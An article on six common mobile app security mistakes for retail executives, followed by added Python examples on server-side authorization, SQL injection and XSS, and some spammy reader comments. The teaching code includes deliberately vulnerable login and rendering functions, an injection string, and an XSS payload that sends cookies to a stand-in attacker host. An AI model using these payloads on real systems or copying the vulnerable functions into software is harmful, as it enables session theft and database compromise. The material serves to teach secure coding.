Six Most Common Mobile App Security Mistakes

BY CSA STAFF

By Nish Bhalla, [email protected]

It’s hard to think of a company, retail or otherwise, that isn’t developing a mobile app these days — but the vast majority of apps are riddled with security flaws that could jeopardize the end-user and expose the company to high costs and embarrassment.

In a recent study with HP, we found that 77% of mobile apps are guilty of information leakage, 26% fail to encrypt properly and 33% are vulnerable to a common hack attack.

The problem generally stems from the fact that many developers aren’t properly trained in security — and even those that are often put design issues ahead of security considerations. It’s common for developers to build a mobile app first, then try to “sprinkle” in security at the end. This leaves the app severely vulnerable to information leakage, unauthorized users and hack attacks. It’s more difficult — and a lot more expensive — to fix a security problem after the fact. Once an app is live, the typical remediation cost ranges from thousands to tens of thousands of dollars per flaw.

It’s important for retail executives to have a solid understanding of common mobile app security flaws and be able to ask the right questions of their developers. Security decisions can’t be left to the developers alone; they have to come from the top.

With that in mind, here are the six most common mobile app security mistakes that retail executives need to watch out for:

1. Storing Critical Information on the Phone: This is probably the most common flaw we see in mobile apps. Developers often let the app store sensitive information on the device itself, such as passwords, customer information, even encryption keys, and often unencrypted. If the phone is ever stolen, or another app on it is compromised, all of this information can fall into the wrong hands. TIP: The best policy is to store as little as possible on the phone. Data should be retrieved from the server when the user logs in and erased when they log out. Whatever must persist on the device, such as a session token, belongs in the platform’s protected credential store (the iOS Keychain or the Android KeyStore), never in a plain preferences file or the app’s own database.

2. Unauthorized Access: An app is supposed to have boundaries, but many don’t. When an app has a problem with “unauthorized access,” it means that a user is able to see other users’ accounts, or to get further into the corporate system than they should, such as reaching administrative functions. Developers often make the mistake of not understanding what the app is actually sending to the server, and how easily an attacker with an intercepting proxy can alter it: change the account number in a request and the server, if it trusts the app, hands back someone else’s data. Hiding a button in the app is not a control. TIP: Every time the app makes a request, the server must verify that the logged-in user is allowed to perform that exact action on that exact record, and reject anything else. It should also raise an internal alert when one user generates a burst of rejected requests, since that is what probing for other customers’ data looks like.

3. Weak Encryption: Developers often fail to use proper encryption to protect information as it travels between the app and the corporate server. This exposes the user’s information to eavesdropping and tampering by anyone on the network path, an attack called “man-in-the-middle.” Even worse, many apps are written to accept any certificate the server presents, so when a connection is being intercepted neither the app nor the user gets any warning. TIP: Make sure your app uses TLS (the protocol most people still call SSL) for every connection between the phone and the server, and that it validates the server’s certificate properly. Then make sure your developer tests the app with an intercepting proxy (the same tool an attacker would use) presenting an untrusted certificate: the app should refuse to connect, and the test fails if the data still flows.

4. Vulnerable to Hack Attacks: Without proper security, apps can be highly susceptible to hacking. Two of the most common attacks are cross-site scripting (XSS) and SQL injection (SQLi). Both exploit the same underlying mistake: data supplied by a user is mixed into code (a web page or a database query) without being kept separate from it. The one thing you need to know is that both steal information. XSS runs the attacker’s script inside a page the victim sees, which matters for apps that display web content, and lets the attacker take over the user’s session, cookies and logins. SQLi turns a form field into database commands and lets the attacker read, change or delete the corporate database. TIP: At a bare minimum, make sure the development team tests the app and its backend against both types of attack. There are a number of automated services that will do this for you. Also ask your developer whether she is testing for all of the vulnerabilities in the OWASP Top 10, and whether the fixes are structural (parameterized queries, output encoding) rather than a blocklist of bad characters.

5. Not Protecting the Server: Mobile apps have to communicate with a server in order to work, and that server is reachable by anyone on the internet, not just by your app. Although the typical mobile app only needs a handful of server functions, developers often leave far more exposed than the app uses: administrative interfaces, debugging endpoints, old API versions, directory listings. Each one is a door an attacker can try. TIP: Your developer should be able to hand you an exact list of everything the server exposes. Every item on it needs to be secured or removed, not just the functions the mobile app calls, because attackers do not limit themselves to the app.

6. Adding Advanced Features: Developers are adding a lot of advanced functionality to today’s mobile apps, such as near field communication (NFC) and QR code readers. In many cases they fail to realize that these features take input from the physical world, from a tag or a printed code that anyone can create, and so need the same scrutiny as any other untrusted input. Without proper precautions they expose the app to a whole new set of attacks. TIP: Have a qualified security firm (a penetration-testing firm) test the app’s advanced features against different types of attack. This is the only way to be confident these features won’t undermine your security.
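The server-side check described under mistake 2, as an added example that is not part of the original commentary and not code from Security Compass or SD Elements. It assumes a toy backend where a request is a session plus a path, account ownership is a dictionary, and an "alert" is a record appended to a list; all account names and users are constructed for illustration. Every request is authorized on the server against the record it names, and a burst of denials from one user raises an internal alert.

```python
"""Server-side authorization on every request, with denial alerting.

Added example. Assumed: sessions, paths and the ownership table below are
hypothetical; a real backend would use its own session and data layers.
"""
from collections import defaultdict, deque
from dataclasses import dataclass
from typing import Deque, Dict, List, Optional

# Constructed sample data: which customer owns which account.
ACCOUNT_OWNER: Dict[str, str] = {"acct-1001": "alice", "acct-1002": "bob"}


@dataclass
class Session:
    """What the server knows about the caller; never derived from app-supplied fields."""
    user: str
    is_admin: bool = False


class DenialMonitor:
    """Counts authorization denials per user in a sliding time window and
    raises an internal alert once a threshold is reached."""

    def __init__(self, threshold: int = 5, window_seconds: float = 60.0):
        self.threshold = threshold
        self.window = window_seconds
        self._denials: Dict[str, Deque[float]] = defaultdict(deque)
        self.alerts: List[str] = []

    def record(self, user: str, now: float) -> Optional[str]:
        q = self._denials[user]
        q.append(now)
        # Forget denials that have fallen out of the window.
        while q and now - q[0] > self.window:
            q.popleft()
        if len(q) >= self.threshold:
            alert = (f"ALERT: {user} made {len(q)} unauthorized requests "
                     f"within {self.window:.0f}s")
            self.alerts.append(alert)
            q.clear()  # one burst produces one alert
            return alert
        return None


def handle_request(session: Session, path: str,
                   monitor: DenialMonitor, now: float) -> int:
    """Return an HTTP-style status: 200 allowed, 403 denied, 404 unknown.

    The decision is made here, on the server, for every request. Whatever
    the app's UI shows or hides is irrelevant: an attacker can replay any
    request with a different account id, so the server must check ownership.
    """
    parts = path.strip("/").split("/")
    if parts[0] == "admin":
        allowed = session.is_admin
    elif parts[0] == "accounts" and len(parts) == 2:
        owner = ACCOUNT_OWNER.get(parts[1])
        if owner is None:
            return 404
        allowed = owner == session.user or session.is_admin
    else:
        return 404
    if not allowed:
        monitor.record(session.user, now)
        return 403
    return 200


if __name__ == "__main__":
    mon = DenialMonitor(threshold=3)
    alice = Session("alice")
    probes = ["/accounts/acct-1001", "/accounts/acct-1002",
              "/accounts/acct-1002", "/admin/users"]
    for t, p in enumerate(probes):
        print(t, p, handle_request(alice, p, mon, float(t)))
    print(mon.alerts)
```

Returning 403 for an account that exists but belongs to someone else tells a prober which ids are real; a backend that wants to avoid account enumeration answers 404 in both cases and still records the denial.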
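The two attacks named under mistake 4, shown as an added example beside their fixes; this is not code from the original commentary or from any real retail app. It uses an in-memory SQLite database with a constructed `users` table, and the login and greeting functions are illustrative. The vulnerable login pastes user input into the SQL text, so a crafted password makes the condition always true; the hardened version binds the same values as parameters. The greeting pair shows the same mistake on the output side, where an unescaped display name becomes script in a web view.

```python
"""SQL injection and XSS: the vulnerable form next to the fixed form.

Added example. The schema, the stored row and the payloads are constructed
for illustration. Real systems must store salted password hashes, not the
plaintext used here; the point of this block is only the query construction.
"""
import html
import sqlite3


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT PRIMARY KEY, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('alice', 'correct horse')")  # constructed
    conn.commit()
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> bool:
    # Attacker-controlled strings become part of the SQL grammar itself.
    query = (f"SELECT username FROM users WHERE username = '{username}' "
             f"AND password = '{password}'")
    return conn.execute(query).fetchone() is not None


def login_parameterized(conn: sqlite3.Connection, username: str, password: str) -> bool:
    # Placeholders keep the values out of the grammar; the driver binds them as data,
    # so a quote or an OR inside the password can only ever be compared, not executed.
    query = "SELECT username FROM users WHERE username = ? AND password = ?"
    return conn.execute(query, (username, password)).fetchone() is not None


def render_greeting_vulnerable(display_name: str) -> str:
    # Unescaped data in HTML: a WebView rendering this executes the script.
    return f"<p>Welcome back, {display_name}</p>"


def render_greeting_safe(display_name: str) -> str:
    # Output encoding turns markup characters into text the browser displays.
    return f"<p>Welcome back, {html.escape(display_name, quote=True)}</p>"


if __name__ == "__main__":
    db = make_db()
    payload = "' OR '1'='1"
    print("vulnerable login with injected password:", login_vulnerable(db, "alice", payload))
    print("parameterized login with same input:   ", login_parameterized(db, "alice", payload))
    xss = "<script>fetch('https://evil.example/?c=' + document.cookie)</script>"
    print(render_greeting_vulnerable(xss))
    print(render_greeting_safe(xss))
```

A tester running the automated scans the article recommends is looking for exactly the first and third functions; the fix is to make every query and every rendering path look like the second and fourth, not to strip quote characters from input.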

Nish Bhalla is the founder/CEO of Security Compass, an information security company that specializes in app security and recently developed SD Elements, a platform for secure app development. His company consults for Fortune 500s, retailers and banks, and contributed to HP’s 2012 Cyber Risk Report on mobile app threats. He can be reached at [email protected].


COMMENTS

A.Webtech says:
Feb-04-2014 06:06 am

app development companies
It is very important for retail managers to have a full understanding of common mobile application security vulnerabilities and to be able to put the right questions to their developers. Security decisions are not just for developers; they have to come from the top. app development companies

A.James says:
May-17-2013 06:53 am

Good Tips
Good tips for mobile app security. Mobile app developers should consider these points when developing apps. Security is an important factor.

S.Singh says:
May-08-2013 06:31 am

Great information about the iPhone
I got some very useful information about iPhones now, but there are various iPhone app development companies that are sure about all these problems and are also working on all of them. You can see iPhone app development here: iPhone Application Development

These are the very common
These are very common mobile app security mistakes. One problem is that it was actually providing that unencrypted copy remotely to any other applications, so any other application on the phone can also see that attachment. http://www.modernlifeblogs.com/2013/04/top-20-handpicked-creative-things-you-can-really-get/
